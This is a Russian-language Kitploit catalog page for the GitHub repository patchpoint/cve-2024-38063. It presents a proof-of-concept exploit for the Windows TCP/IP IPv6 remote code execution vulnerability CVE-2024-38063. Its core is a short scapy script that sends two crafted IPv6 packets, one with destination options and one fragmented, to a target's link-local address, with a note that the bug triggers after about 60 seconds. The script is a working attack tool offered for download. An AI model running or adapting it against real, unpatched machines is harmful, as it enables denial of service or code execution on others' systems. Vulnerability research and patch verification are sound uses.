Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-38063 — Доказательство концепции эксплуатации для CVE-2024-38063 — уязвимости удалённого выполнения кода в Windows TCP/IP, которая срабатывает при отправке двух специально сформированных IPv6-пакетов с опциями назначения и фрагментированными заголовками. | Kitploit
Инструменты/GitHubGitHub/patchpoint/cve-2024-38063
Анализ уязвимостейЭксплуатацияСетевая безопасностьТестирование на ПроникновениеРазработка Полезной НагрузкиЭксплуатация Бинарных Файлов
GitHubpatchpoint/cve-2024-38063

CVE-2024-38063

Доказательство концепции эксплуатации для CVE-2024-38063 — уязвимости удалённого выполнения кода в Windows TCP/IP, которая срабатывает при отправке двух специально сформированных IPv6-пакетов с опциями назначения и фрагментированными заголовками.

Репозиторий
20332 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-38063

Обзор

В августе 2024 года Microsoft выпустила патч для уязвимости удалённого выполнения кода (RCE) в Windows TCP/IP. Некоторые исследователи уже опубликовали Proofs of Concept (PoC) для этой уязвимости, и примерно в то же время исследователи PatchPoint также завершили свой анализ и воспроизведение данной проблемы. Из-за распространения дезинформации на различных платформах, включая Twitter, похоже, что ключевые моменты, необходимые для эксплуатации этой уязвимости, были поняты неправильно. Вопреки этим неточностям, мы решили выпустить PoC, демонстрирующий, как эту уязвимость можно проэксплуатировать с помощью передачи всего двух пакетов. В действительности, для эксплуатации этой уязвимости не требуется большого количества пакетов.

PoC

root@kitploit:~
from scapy.all import *
IPAddr  = '' # fe80::XXXX:XXXX:XXXX:XXXX
MACAddr = '' # XX:XX:XX:XX:XX:XX
ExtHdrDestOpt  = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)

PCAP

pcap

DEMO

CVE-2024-38063_Demo.mp4

※ Для срабатывания уязвимости требуется подождать примерно 60 секунд

Ссылки

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063
Скачать инструмент